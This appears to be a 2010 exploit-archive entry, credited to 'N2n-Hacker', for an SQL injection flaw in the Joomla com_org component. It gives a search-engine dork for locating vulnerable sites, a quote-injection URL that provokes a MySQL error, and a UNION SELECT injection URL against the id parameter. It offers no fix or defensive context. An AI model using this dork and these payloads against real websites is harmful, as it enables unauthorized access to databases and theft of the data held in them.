[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_org SQL Injection Vulnerability
# Published : 2010-03-14
# Author : N2n-Hacker
# Previous Title : Trouble Ticket Express <= 3.01 Remote Code Execution/Directory Traversal
# Next Title : PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability
###############################################################################
## ##
## Joomla com_org SQL Injection Vulnerability ##
## ##
###############################################################################
\\\\\\\\\\\\\N2n-Hacker - 2nd@live.fr////////////////////////////
*******************************************************************************
=> Dork = inurl:"option=com_org"
-------------------------------------------------------------------------------
# EXp : http://www.website.com/path/index.php?option=com_org&task=info&id=22' <=[SQLI] --〈=en
Error = "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version"
# http://www.website.com/path/index.php?option=com_org&task=info&id=-22 UNION SELECT 1,2 ..... --〈=en
********************************************************************************
\\\\\\\\\ BAD LIFE //////////////////
********************************************************************************